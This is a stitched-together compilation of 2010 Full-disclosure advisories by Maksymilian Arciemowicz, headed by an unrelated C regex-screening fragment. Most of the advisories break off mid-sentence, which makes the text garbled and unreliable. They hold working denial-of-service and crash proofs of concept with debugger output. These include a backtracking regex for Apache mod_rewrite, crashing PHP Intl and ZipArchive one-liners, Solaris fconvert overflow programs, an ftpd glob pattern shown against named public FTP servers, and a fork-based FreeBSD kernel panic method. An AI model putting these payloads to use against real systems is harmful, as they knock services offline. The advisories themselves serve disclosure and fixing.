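            if (j < n && pat[j] == '^') j++;
            if (j < n && pat[j] == ']') j++;   /* a leading ']' is literal */
            while (j < n && pat[j] != ']') j++;
            i = (j < n) ? j + 1 : n;
            prev_quant = 0;
            continue;
        }
        if (c == '*' || c == '+' || c == '?') {
            if (prev_quant) return 1;
            prev_quant = 1;
            i++;
            continue;
        }
        if (c == '{') {                 /* interval "{m}", "{m,}" or "{m,n}" */
            const char *close = strchr(pat + i, '}');
            if (close == NULL)          /* unterminated: regcomp reports REG_EBRACE itself */
                return 0;
            if (prev_quant) return 1;
            prev_quant = 1;
            i = (size_t)(close - pat) + 1;
            continue;
        }
        prev_quant = 0;
        i++;
    }
    return 0;
}

/* Compile with the screen in front. Returns REG_BADRPT for a stacked
 * quantifier, otherwise whatever regcomp(3) returns for the pattern.
 * The compiled object is released again; a real caller would keep it. */
int screen_and_compile(const char *pat)
{
    regex_t re;
    int rc;

    if (has_stacked_quantifier(pat))
        return REG_BADRPT;
    rc = regcomp(&re, pat, REG_EXTENDED | REG_NOSUB);
    if (rc == 0)
        regfree(&re);
    return rc;
}
```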
[Full-disclosure] Apache Insecure mod_rewrite PCRE Resource Exhaustion
[ Apache Insecure mod_rewrite PCRE Resource Exhaustion ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/

Date:
- Dis.: 19.09.2010
- Pub.: 21.12.2010

Affected (tested):
- NetBSD 5.0.2 (Apache 2.2.17 PHP 5.3.4)
- Ubuntu 10.10 (Apache 2.2.16 PHP 5.3.3)

Original URL: http://securityreason.com/achievement_securityalert/92

--- 0. Description ---

The Apache HTTP Server, commonly referred to as Apache, is web server software notable for playing a key role in the initial growth of the World Wide Web. In 2009 it became the first web server software to surpass the 100 million web site milestone.

The PCRE (Perl Compatible Regular Expressions) library is a set of functions that implement regular expression pattern matching using the same syntax and semantics as Perl 5. PCRE has its own native API, as well as a set of wrapper functions that correspond to the POSIX regular expression API. The PCRE library is free, even for building proprietary software.

--- 1. Apache Insecure mod_rewrite PCRE Resource Exhaustion ---

Using mod_rewrite and the PCRE libs can be dangerous for the stability of an Apache server. Everybody knows that using PCRE regular expressions generates a possible risk of a DoS attack, and using multiple regular expressions in .htaccess is not a good idea. I will show the possibility of a DoS attack using .htaccess. Of course we can try to configure our machine to be safe; anyway, many servers are affected by this.

Many versions of regular expressions have no control over what executes. Example tags: let's see what will happen in Firefox for this expression:

.*.*.*(\w+)$1

Nothing special. Try this:

.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*(\w+)$1

Result in Firefox JavaScript: "Warning: Unresponsive script". Long execution in PCRE generates "Unresponsive script".

That same algorithm we can use in .htaccess.

$ httpd -v && php -v
Server version: Apache/2.2.17 (Unix)
Server built:   Nov 11 2010 19:51:37
PHP 5.3.4 (cli) (built: Nov 11 2010 17:17:35)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies

$ pwd && ls -la
/home/cx/public_html
total 4
drwxrwxrwx   2 cx  cx     512 Dec 19 01:10 .
drwxr-xr-x  12 cx  wheel 1024 Dec 19 01:10 ..
$ vi poc.php
$ ls -la .
total 8
drwxrwxrwx   2 cx  cx     512 Dec 19 01:16 .
drwxr-xr-x  12 cx  wheel 1024 Dec 19 01:10 ..
-rw-r--r--   1 cx  cx    2665 Dec 19 01:18 poc.php

and a remote request to poc.php:

c...@cx64:~$ curl http://172.16.124.128/~cx/poc.php

On the server, all Apache children will stop in .htaccess (mod_rewrite => PCRE):

# ps -aux -U www
USER  PID %CPU %MEM   VSZ   RSS TTY STAT STARTED    TIME COMMAND
www   503 13.8  2.4 35620 27420 ?   R    1:19AM  0:04.94 /usr/pkg/sbin/httpd -k start
www   414  9.6  2.3 33572 25400 ?   R    1:20AM  0:03.24 /usr/pkg/sbin/httpd -k start
www   474  7.9  2.2 32548 24544 ?   R    1:19AM  0:02.17 /usr/pkg/sbin/httpd -k start
www   345  6.5  2.1 31524 23888 ?   R    1:19AM  0:01.79 /usr/pkg/sbin/httpd -k start
www   482  7.0  1.9 29476 21536 ?   R    1:22AM  0:00.94 /usr/pkg/sbin/httpd -k start
www   495  4.6  2.0 30500 22944 ?   R    1:19AM  0:01.24 /usr/pkg/sbin/httpd -k start
www   844  3.2  0.5 11980  5280 ?   S    1:22AM  0:00.94 /usr/pkg/libexec/cgi-bin/php
www   289  2.2  1.0 19236 10888 ?   R    1:22AM  0:00.23 /usr/pkg/sbin/httpd -k start
www   859  3.2  1.5 25380 17220 ?   R    1:22AM  0:00.44 /usr/pkg/sbin/httpd -k start
www   337  0.0  0.3 12068  3152 ?   S    1:22AM  0:00.01 /usr/pkg/sbin/httpd -k start
www   502  0.0  0.3 11988  3252 ?   S    1:19AM  0:00.01 /usr/pkg/sbin/httpd -k start
www   543  0.0  0.3 12068  3152 ?   S    1:22AM  0:00.01 /usr/pkg/sbin/httpd -k start
www   554  0.0  0.3 12068  3152 ?   S    1:22AM  0:00.01 /usr/pkg/sbin/httpd -k start
www   754  0.0  0.4 12068  3940 ?   S    1:19AM  0:00.01 /usr/pkg/sbin/httpd -k start
www   955  0.0  0.3 12068  3152 ?   S    1:22AM  0:00.01 /usr/pkg/sbin/httpd -k start
www   979  0.0  0.3 12068  3152 ?   S    1:22AM  0:00.01 /usr/pkg/sbin/httpd -k start

# ps -aux -U www
USER  PID %CPU %MEM   VSZ   RSS TTY STAT STARTED    TIME COMMAND
www   389  4.0  1.9 29476 21360 ?   R    1:22AM  0:00.80 /usr/pkg/sbin/httpd -k start
www   455  4.3  1.8 28452 20080 ?   R    1:22AM  0:00.55 /usr/pkg/sbin/httpd -k start
www   712  4.9  1.8 27428 19688 ?   R    1:22AM  0:00.51 /usr/pkg/sbin/httpd -k start
www   516  3.8  2.1 31524 23632 ?   R    1:22AM  0:02.05 /usr/pkg/sbin/httpd -k start
...
www  1011  2.3  2.0 30500 21980 ?   R    1:22AM  0:01.16 /usr/pkg/sbin/httpd -k start
www   398  0.0  0.3 12068  3156 ?   S    1:23AM  0:00.01 /usr/pkg/sbin/httpd -k start
www   400  0.0  0.3 12068  3156 ?   S    1:23AM  0:00.01 /usr/pkg/sbin/httpd -k start
www   502  0.0  0.3 11988  3252 ?   I    1:19AM  0:00.01 /usr/pkg/sbin/httpd -k start
www   653  0.0  0.3 12068  3156 ?   S    1:23AM  0:00.01 /usr/pkg/sbin/httpd -k start
www   754  0.0  0.4 12068
[Full-disclosure] PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow
[ PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/

Date:
- Dis.: 11.11.2010
- Pub.: 10.12.2010

CERT: VU#479900
CVE: CVE-2010-4409
CWE: CWE-189
Status: Fixed in PHP 5.3.4

Affected Software:
- PHP 5.3.3

Original URL: http://securityreason.com/achievement_securityalert/91

--- 0. Description ---

The Internationalization extension (further referred to as Intl) is a wrapper for the ICU library, enabling PHP programmers to perform UCA-conformant collation and date/time/number/currency formatting in their scripts.

Number Formatter: allows to display numbers according to the localized format or a given pattern or set of rules, and to parse strings into numbers.

--- 1. PoC for Integer Overflow ---

$nx=new NumberFormatter("pl",1);
$nx->getSymbol(2147483648);

--- 2. PHP 5.3.3/5.2.14 NumberFormatter::getSymbol Integer Overflow ---

As we can see in

---
PHP_FUNCTION( numfmt_get_symbol )
{
        long symbol;
        UChar value_buf[4];
        UChar *value = value_buf;
        int length = USIZE(value);
        FORMATTER_METHOD_INIT_VARS;

        /* Parse parameters. */
        if( zend_parse_method_parameters( ZEND_NUM_ARGS() TSRMLS_CC, getThis(), "Ol",
                &object, NumberFormatter_ce_ptr, &symbol ) == FAILURE )
        {
                intl_error_set( NULL, U_ILLEGAL_ARGUMENT_ERROR,
                        "numfmt_get_symbol: unable to parse input params", 0 TSRMLS_CC );
                RETURN_FALSE;
        }

        /* Fetch the object. */
        FORMATTER_METHOD_FETCH_OBJECT;

        length = unum_getSymbol(FORMATTER_OBJECT(nfo), symbol, value_buf, length, &INTL_DATA_ERROR_CODE(nfo)); <= !!!TOO BIG INT HERE!!!
        ...
---

It will crash for different values, for example {292804, 2147483648, 2147483649, 2554462209} (when rdi is out of band; range 2^31 to 2^32 under 64-bit Linux):

Program received signal SIGSEGV, Segmentation fault.
0x7fffedf317f5 in icu_4_2::UnicodeString::extract(unsigned short*, int, UErrorCode&) const () from /usr/lib/libicuuc.so.42
(gdb) bt
#0  0x7fffedf317f5 in icu_4_2::UnicodeString::extract(unsigned short*, int, UErrorCode&) const () from /usr/lib/libicuuc.so.42
#1  0x7fffee5d11c0 in zif_numfmt_get_symbol (ht=17168120, return_value=0x105c928, return_value_ptr=0x4, this_ptr=0x105f710, return_value_used=17168144) at /build/buildd/php5-5.3.3/ext/intl/formatter/formatter_attr.c:269
...blabla
rip            0x7fffedf317f5  0x7fffedf317f5
eflags         0x10206         [ PF IF RF ]

Let's see the value ~4294901761:

$nx=new NumberFormatter("pl",1);
$nx->getSymbol(4294901761);

It will crash in memcpy(3) ;]

Program received signal SIGSEGV, Segmentation fault.
memcpy () at ../sysdeps/x86_64/memcpy.S:90
90      ../sysdeps/x86_64/memcpy.S: No such file or directory.
        in ../sysdeps/x86_64/memcpy.S
(gdb) bt
#0  memcpy () at ../sysdeps/x86_64/memcpy.S:90
#1  0x7fffea74a86a in icu_4_2::UnicodeString::extract(unsigned short*, int, UErrorCode&) const () from /usr/lib/libicuuc.so.42
#2  0x7fffeadea2b4 in zif_numfmt_get_symbol (ht=17826952, return_value=0x10fecd0, return_value_ptr=0xc, this_ptr=0x11004a0, return_value_used=17826976) at /build/buildd/php5-5.3.3/ext/intl/formatter/formatter_attr.c:274
#3  0x006e986a in zend_do_fcall_common_helper_SPEC (execute_data=0x77eb8068) at /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316
...

Let's see ICU UnicodeString::extract(unsigned short*, int, UErrorCode&):

---
int32_t
UnicodeString::extract(UChar *dest, int32_t destCapacity,
                       UErrorCode &errorCode) const {
  int32_t len = length();
  if(U_SUCCESS(errorCode)) {
    if(isBogus() || destCapacity<0 || (destCapacity>0 && dest==0)) {
      errorCode=U_ILLEGAL_ARGUMENT_ERROR;
    } else {
      const UChar *array = getArrayStart();
      if(len>0 && len<=destCapacity && array!=dest) {
        uprv_memcpy(dest, array, len*U_SIZEOF_UCHAR); <=== MEMCPY REFERENCE HERE
      }
      return u_terminateUChars(dest, destCapacity, len, &errorCode);
    }
  }
  return len;
}
---

So the crash is in rip=memcpy(3).

The getLocale() method can also generate a simple crash (CWE-170):

$nx=new IntlDateFormatter("pl", IntlDateFormatter::FULL, IntlDateFormatter::FULL);
$nx->getLocale(1);

--- 3. Fix ---

Fix in next PHP version 5.3.4:
http://www.kb.cert.org/vuls/id/479900

SVN:
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/intl/dateformat/dateformat_attr.c?view=log
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/intl/formatter/formatter_attr.c?view=log

--- 4. Greets ---

Special thanks to Pierre Joye and Stas Malyshev for the very quick fix, Michael Orlando for security support, and sp3x, Infospec

--- 5. Contact ---

Au
[Full-disclosure] PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment NULL Pointer Dereference
[ PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment NULL Pointer Dereference ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/

Date:
- Dis.: 14.09.2010
- Pub.: 05.11.2010

CVE: CVE-2010-3709
CWE: CWE-476
Status: Fixed in CVS

Affected Software:
- PHP 5.3.3
- PHP 5.2.14

Original URL: http://securityreason.com/achievement_securityalert/90

--- 0. Description ---

ZipArchive enables you to transparently read or write ZIP compressed archives and the files inside them.

ZipArchive::getArchiveComment - Returns the Zip archive comment string
ZipArchive::getArchiveComment ( void )

--- 1. PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment (CWE-476) ---

As we can see in
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/php_zip.c?revision=303622&view=markup

---
1945 static ZIPARCHIVE_METHOD(getArchiveComment)
1946 {
1947         struct zip *intern;
1948         zval *this = getThis();
1949         long flags = 0;
1950         const char * comment;
1951         int comment_len = 0;
1952 
1953         if (!this) {
1954                 RETURN_FALSE;
1955         }
1956 
1957         ZIP_FROM_OBJECT(intern, this);
1958 
1959         if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "|l", &flags) == FAILURE) {
1960                 return;
1961         }
1962 
1963         comment = zip_get_archive_comment(intern, &comment_len, (int)flags); <= RETURNS NULL AND -1
1964         RETURN_STRINGL((char *)comment, (long)comment_len, 1); <= NULL POINTER DEREFERENCE HERE
1965 }
---

This method returns a string from the zip_get_archive_comment() function. Now we need to see this function:
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/lib/zip_get_archive_comment.c?revision=284361&view=markup

---
40 ZIP_EXTERN(const char *)
41 zip_get_archive_comment(struct zip *za, int *lenp, int flags)
42 {
43     if ((flags & ZIP_FL_UNCHANGED)
44         || (za->ch_comment_len == -1)) {
45         if (za->cdir) {
46             if (lenp != NULL)
47                 *lenp = za->cdir->comment_len;
48             return za->cdir->comment;
49         }
50         else {
51             if (lenp != NULL)
52                 *lenp = -1;          <= -1
53             return NULL;             <= NULL
54         }
55     }
56 
57     if (lenp != NULL)
58         *lenp = za->ch_comment_len;
59     return za->ch_comment;
60 }
---

Lines 52 and 53 return a NULL pointer and (int)-1. As a result RETURN_STRINGL() will be executed with:

RETURN_STRINGL(NULL, -1, 1);

and crash in memcpy(3).

--- 2. PoC ---

c...@cx64:/www$ touch empty.zip
c...@cx64:/www$ php -r '$zip= new ZipArchive;$zip->open("./empty.zip");$zip->getArchiveComment();'
Segmentation fault

Debug:

c...@cx64:/www$ gdb -q php
Reading symbols from /usr/bin/php...(no debugging symbols found)...done.
(gdb) r -r '$zip= new ZipArchive;$zip->open("./empty.zip");$zip->getArchiveComment();'
Starting program: /usr/bin/php -r '$zip= new ZipArchive;$zip->open("./empty.zip");$zip->getArchiveComment();'
[Thread debugging using libthread_db enabled]

Program received signal SIGSEGV, Segmentation fault.
0x7530edbb in memcpy () from /lib/libc.so.6
(gdb) bt
#0  0x7530edbb in memcpy () from /lib/libc.so.6
#1  0x00679fa8 in _estrndup ()
#2  0x006371e5 in ?? ()
#3  0x006e793a in ?? ()
#4  0x006bec20 in execute ()
#5  0x0068b44a in zend_eval_stringl ()
#6  0x0068b5c9 in zend_eval_stringl_ex ()
#7  0x0072743e in ?? ()
#8  0x752a6c4d in __libc_start_main () from /lib/libc.so.6
#9  0x0042c6a9 in _start ()
(gdb) x/i $rip
=> 0x7530edbb :  rep movsq %ds:(%rsi),%es:(%rdi)
(gdb) x/x $rsi
   0x0:  Cannot access memory at address 0x0
(gdb) x/x $rbp
   0x:  Cannot access memory at address 0x

--- 3. Fix ---

Fix: Replace

1963         comment = zip_get_archive_comment(intern, &comment_len, (int)flags);
1964         RETURN_STRINGL((char *)comment, (long)comment_len, 1);

with

1963         comment = zip_get_archive_comment(intern, &comment_len, (int)flags);
1964         if(comment==NULL) RETURN_FALSE;
1965         RETURN_STRINGL((char *)comment, (long)comment_len, 1);

PHP 5.3:
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/php_zip.c?view=log
PHP 5.2:
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/zip/php_zip.c?view=log
MDVSA-2010:218

--- 4. Greets ---

Special thanks to Pierre Joye, sp3x, Infospec, Adam Zabrocki 'pi3'

--- 5. Contact ---

Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email:
- cxib {a\./t] securityreason [d=t} com
GPG:
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com/
http://cxib.net/

-- 
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid                  Maksymilian Arciemowicz (cx)
sub   4096R/58BA663C 2010-09-19
[Full-disclosure] Multiple Vendors libc/glob(3) resource exhaustion (+0day remote ftpd-anon)
[ Multiple Vendors libc/glob(3) resource exhaustion (+0day remote ftpd-anon) ]

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/

Date:
- Dis.: 06.11.2009
- Pub.: 07.10.2010

CVE: CVE-2010-2632

Affected Software (verified):
- OpenBSD 4.7
- NetBSD 5.0.2
- FreeBSD 7.3/8.1
- Oracle Sun Solaris 10
- GNU Libc (glibc)

Affected Ftp Servers:
- ftp.openbsd.org (verified 02.07.2010: "connection refused" and ban)
- ftp.netbsd.org (verified 02.07.2010: "connection limit of 160 reached" and ban)
- ftp.freebsd.org
- ftp.adobe.com
- ftp.hp.com
- ftp.sun.com
- more more and more

Affected Vendors (not verified):
- Apple
- Microsoft Interix
- HP
- more more more

Original URL: http://securityreason.com/achievement_securityalert/89

--- 0. Description ---

#include <glob.h>

int
glob(const char *pattern, int flags,
     int (*errfunc)(const char *epath, int eerrno), glob_t *pglob);

Description
This function expands a filename wildcard which is passed as pattern.

GLOB_LIMIT
Limit the amount of memory used by matches to ARG_MAX. This option should be set for programs that can be coerced to a denial of service attack via patterns that expand to a very large number of matches, such as a long string of */../*/..

--- 1. Multiple Vendors libc/glob(3) resource exhaustion ---

As we can read in the definition of GLOB_LIMIT:

--
Limit the amount of memory used by matches to ARG_MAX. This option should be set for programs that can be coerced to a denial of service attack via patterns that expand to a very large number of matches, such as a long string of */../*/..
--

But now comes the question: "what will happen when we use */.. without matching any results (simple searching)?" GLOB_LIMIT will not be overflowed. To realize it, we need only use a pattern with many */.. and many inodes in the current directory. At the end of the pattern, we need to add some non-existent filename (like /cxib*). If we don't have many files or directories in the attacked directory, we need to create some dir structure.

Let's see again:
http://cvsweb.netbsd.org/bsdweb.cgi/src/libexec/ftpd/ftpd.c?rev=1.61.2.5&content-type=text/x-cvsweb-markup

GLOB_LIMIT protects us from attacks like

*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*

because glob will find more paths than declared in GLOB_LIMIT. Anyway, if we use a path which does not exist (with */.. strings) like

*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*blablahaha

GLOB_LIMIT will never be overflowed. Many combinations of paths will make this process execute for a long time. We can also try to allocate (GLOB_LIMIT-1)*MAXPATHNAMELEN bytes per one process. ~200~300MB

Example:

> telnet ftp.netbsd.org 21
Trying 204.152.190.15...
Connected to ftp.netbsd.org.
Escape character is '^]'.
220 ftp.NetBSD.org FTP server (NetBSD-ftpd 20100320) ready.
user anonymous
331 Guest login ok, type your name as password.
pass a...@cxib
230-
    The NetBSD Project FTP Server located in Redwood City, CA, USA
...
230-    EXPORT NOTICE
...
230 Guest login ok, access restrictions apply.
stat {..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*cx

This request will generate 100% usage of the process for a long time. ftpd goes into glob(3) and will not get out fast.

A very similar symptom was described in the vulnerability for glibc strfmon(3):

-- http://securityreason.com/achievement_securityalert/67 --
...
Interesting is that the PHP memory_limit has no control over what happens at the level of libc. Function strfmon(3) can allocate a lot of data in memory without control by PHP memory_limit.

For example:

php -r 'money_format("%.1343741821i",1);'

will allocate ~1049MB real memory. memory_limit can be less than 1049M
...
-- http://securityreason.com/achievement_securityalert/67 --

ftpd also doesn't control what will happen in libc. So it is enough to send

---
USER anonymous
PASS
STAT */..[calculated pattern]
---

and disconnect to connect again (bypass firewall limits). In PHP we can also bypass max_memory_limit by libc vulns. Attacking a machine in this way, we can cause various side effects.

--- kernel panic in netbsd502 ---
Jul  5 10:18:13 dhclient: DHCPACK from 192.168.92.254
Jul  5 10:18:14 dhclient: bound to 192.168.92.171 -- renewal in 886 seconds.
Jul  5 10:22:43 syslogd: restart
Jul  5 10:22:43 /netbsd: uvm_fault(0xcc2eb35c, 0, 2) -> 0xe
Jul  5 10:22:43 /netbsd: fatal page fault in supervisor mode
Jul  5 10:22:43 /netbsd: trap type 6 code 2 eip c07d9784 cs 8 eflags 10206 cr2 0 ilevel 0
Jul  5 10:22:43 /netbsd: panic: trap
Jul  5 10:22:43 /netbsd: Begin traceback...
Jul  5 10:22:43 /netbsd: End traceba
[Full-disclosure] FreeBSD 8.1/7.3 vm.pmap kernel local race condition
[ FreeBSD 8.1/7.3 vm.pmap kernel local race condition ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
http://lu.cxib.net

Date:
- Dis.: 09.07.2010
- Pub.: 07.09.2010

Affected Software (verified):
- FreeBSD 7.3/8.1

Original URL: http://securityreason.com/achievement_securityalert/88

--- 0. Description ---

maxproc
This is the maximum number of processes a user may be running. This includes foreground and background processes alike. For obvious reasons, this may not be larger than the system limit specified by the kern.maxproc sysctl(8). Also note that setting this too small may hinder a user's productivity: it is often useful to be logged in multiple times or execute pipelines. Some tasks, such as compiling a large program, also spawn multiple processes (e.g., make(1), cc(1), and other intermediate preprocessors).

vm.pmap.shpgperproc

--- 1. FreeBSD 8.1/7.3 kernel local race condition ---

A race condition in pmap allows attackers to deny service to the FreeBSD kernel. By creating a lot of processes with fork() (~ kern.maxproc), it's possible to deny the kernel. To bypass MAXPROC from login.conf, we can use a few users to run the PoC at the same time, to reach kern.maxproc. suphp can be very useful.

We need to choose the attack vector. When we have access to a few users via ssh, use openssh.

Example attack by ssh (POC: http://securityreason.com/achievement_exploitalert/16):

127# ssh c...@0
Password:
$ gcc -o poc81 poc81.c
$ ./poc81

and at the same time (symmetric)

127# ssh m...@0
Password:
$ gcc -o poc81 poc81.c
$ ./poc81

Result:

Jul 29 08:41:29 127 kernel: maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5).
Jul 29 08:42:01 127 last message repeated 31 times
Jul 29 08:44:02 127 last message repeated 119 times
Jul 29 08:50:27 127 syslogd: kernel boot file is /boot/kernel/kernel
Jul 29 08:50:27 127 kernel: maxproc limit exceeded by uid 0, please see tuning(7) and login.conf(5).
Jul 29 08:50:27 127 kernel: panic: get_pv_entry: increase vm.pmap.shpgperproc
Jul 29 08:50:27 127 kernel: cpuid = 0
Jul 29 08:50:27 127 kernel: Uptime: 13m23s
Jul 29 08:50:27 127 kernel: Cannot dump. Device not defined or unavailable.
Jul 29 08:50:27 127 kernel: Automatic reboot in 15 seconds - press a key on the console to abort
Jul 29 08:50:27 127 kernel: --> Press a key on the console to reboot,
Jul 29 08:50:27 127 kernel: --> or switch off the system now.
Jul 29 08:50:27 127 kernel: Rebooting...
Jul 29 08:50:27 127 kernel: Copyright (c) 1992-2010 The FreeBSD Project.

But when we have a php-shell from several uids, we can also use suphp.

Example attack by suphp:

127# cat cxuser.php
127# ls -la
total 16
drwxr-xr-x  2 root  wheel   512 Jul 29 08:43 .
drwxr-xr-x  4 root  wheel   512 Jul 29 08:38 ..
-rw-r--r--  1 cx    cx       27 Jul 29 08:38 cxuser.php
-rwxr-xr-x  1 cx    cx     7220 Jul 29 08:38 def
-rw-r--r--  1 max   max      27 Jul 29 08:43 maxuser.php

Now a remote request to cxuser.php and maxuser.php:

curl http://victim/hack/cxuser.php

and at the same time

curl http://victim/hack/maxuser.php

Result:

Jul 29 08:43:07 localhost login: ROOT LOGIN (root) ON ttyv0
Jul 29 08:48:30 localhost syslogd: kernel boot file is /boot/kernel/kernel
Jul 29 08:48:30 localhost kernel: maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5).
Jul 29 08:48:30 localhost kernel: panic: get_pv_entry: increase vm.pmap.shpgperproc
Jul 29 08:48:30 localhost kernel: cpuid = 0
Jul 29 08:48:30 localhost kernel: Uptime: 4m43s
Jul 29 08:48:30 localhost kernel:
Jul 29 08:48:30 localhost kernel: Dump failed. Partition too small.
Jul 29 08:48:30 localhost kernel: Automatic reboot in 15 seconds - press a key on the console to abort
Jul 29 08:48:30 localhost kernel: Rebooting...
Jul 29 08:48:30 localhost kernel: Copyright (c) 1992-2010 The FreeBSD Project.

--- debug log - cron (uid=0) ---
...
maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5).
maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5).
maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5).
maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5).
panic: get_pv_entry: increase vm.pmap.shpgperproc
cpuid = 0
KDB: enter: panic
[ thread pid 7417 tid 106207 ]
Stopped at      kdb_enter+0x3a: movl    $0,kdb_why
...
KDB: enter: panic
[ thread pid 7417 tid 106207 ]
Stopped at      kdb_enter+0x3a: movl    $0,kdb_why
db> ps
  pid  ppid  pgrp   uid  state  wmesg   wchan       cmd
 7417   880   880     0  RL     CPU 0               cron
 7416   880   880     0  RL                         cron
 7415  7413   880     0  RVL                        cron
 7414  7412  7412     0  R                          sh
 7413   880   880     0  D      ppwait  0xc8118548  cron
 7412  7411  7412     0  Ss     wait    0xc8118aa0  sh
 7411   880   880     0  S      piperd  0xc4d7eab8  cron
 7410  5367  1294  1001  RL+                        def
 7409  5366  1294  1001  RL+                        def
 7408  5365  1294  1001  RL+                        def
 7407  5364  1294  1001  RL+                        def
 7406  5363  1294  1001  RL+                        def
 7405  5362  1294  1001  RL+                        def
 7404  5361  1294  1001  RL+                        def
...
db> trace
Tracing
[Full-disclosure] Sun Solaris 10 libc/*convert (*cvt) buffer overflow
[ Sun Solaris 10 libc/*convert (*cvt) buffer overflow ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com

Date:
- Dis.: 15.04.2010
- Pub.: 21.05.2010

Affected Software:
- Sun Solaris 10 10/9

Original URL: http://securityreason.com/achievement_securityalert/86

--- 0. Description ---

SYNOPSIS
     #include <floatingpoint.h>

     char *econvert(double value, int ndigit, int *decpt, int *sign, char *buf);
     char *fconvert(double value, int ndigit, int *decpt, int *sign, char *buf);
     char *gconvert(double value, int ndigit, int trailing, char *buf);
     char *seconvert(single *value, int ndigit, int *decpt, int *sign, char *buf);
     char *sfconvert(single *value, int ndigit, int *decpt, int *sign, char *buf);
     char *sgconvert(single *value, int ndigit, int trailing, char *buf);
     char *qeconvert(quadruple *value, int ndigit, int *decpt, int *sign, char *buf);
     char *qfconvert(quadruple *value, int ndigit, int *decpt, int *sign, char *buf);
     char *qgconvert(quadruple *value, int ndigit, int trailing, char *buf);

The econvert() function converts the value to a null-terminated string of ndigit ASCII digits in buf and returns a pointer to buf. buf should contain at least ndigit+1 characters. The position of the decimal point relative to the beginning of the string is stored indirectly through decpt. Thus buf == "314" and *decpt == 1 corresponds to the numerical value 3.14, while buf == "314" and *decpt == -1 corresponds to the numerical value .0314. If the sign of the result is negative, the word pointed to by sign is nonzero; otherwise it is zero. The least significant digit is rounded.

SYNOPSIS
     #include <stdlib.h>

     char *ecvt(double value, int ndigit, int *restrict decpt, int *restrict sign);
     char *fcvt(double value, int ndigit, int *restrict decpt, int *restrict sign);
     char *gcvt(double value, int ndigit, char *buf);

DESCRIPTION
     The ecvt(), fcvt() and gcvt() functions convert floating-point numbers to null-terminated strings.

--- 1. Sun Solaris 10 libc/*convert (*cvt) buffer overflow ---

The main problem exists in Sun Solaris libc. OpenSolaris is not affected.

PoC:
---
# cat jaja.c
#include <stdio.h>
#include <stdlib.h>

int main (int argc, char *argv[]){
        char number[1];
        int a,b;
        printf("%s", fconvert((double)0,atoi(argv[1]),&a,&b,number));
        return 0;
}
# /usr/local/bin/gcc -o jaja jaja.c
# ./jaja 16
#
# ./jaja 512
#
---

For 512 it will work fine, because we have used (double)0 to convert. When we use a non-zero value, it crashes. OK, let's set a non-zero value in jaja2.c.

PoC:
---
# cat jaja2.c
#include <stdio.h>
#include <stdlib.h>

int main (int argc, char *argv[]){
        char number[1];
        int a,b;
        printf("%s", fconvert((double)1,atoi(argv[1]),&a,&b,number));
        return 0;
}
# /usr/local/bin/gcc -o jaja2 jaja2.c
# ./jaja2 512
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q jaja2
(no debugging symbols found)
(gdb) r 512
Starting program: /jaja2 512
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfeeab05c in fconvert () from /lib/libc.so.1
(gdb) i r
eax            0x8047240        134509120
ecx            0x3250           12880
edx            0x8048000        134512640
ebx            0xfef9e000       -17178624
esp            0x8044b38        0x8044b38
ebp            0x8044d68        0x8044d68
esi            0x200            512
edi            0x0              0
eip            0xfeeab05c       0xfeeab05c
eflags         0x10206          [ PF IF RF ]
cs             0x3b             59
ss             0x43             67
ds             0x43             67
es             0x43             67
fs             0x0              0
gs             0x1c3            451
(gdb) x/x $edx
0x8048000:      Cannot access memory at address 0x8048000
(gdb)
---

The same result we can get with perl(1).

PoC perl:
---
#!/usr/local/bin/perl
printf "%.512f", 1;

# perl pss.pl
Segmentation Fault - core dumped
# /usr/local/bin/gdb -q perl
(no debugging symbols found)
(gdb) r pss.pl
Starting program: /usr/bin/perl pss.pl
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no d
[Full-disclosure] Sun Solaris 10 filesystem rm(1), find(1), etc, Denial-of-service
[ Sun Solaris 10 filesystem rm(1),find(1),etc, Denial-of-service ]

Author: Maksymilian Arciemowicz
SecurityReason.com

Date:
- Dis.: 17.04.2010
- Pub.: 21.05.2010

Affected Software:
- Sun Solaris 10 10/09

Original URL: http://securityreason.com/achievement_securityalert/85

--- 0. Description ---

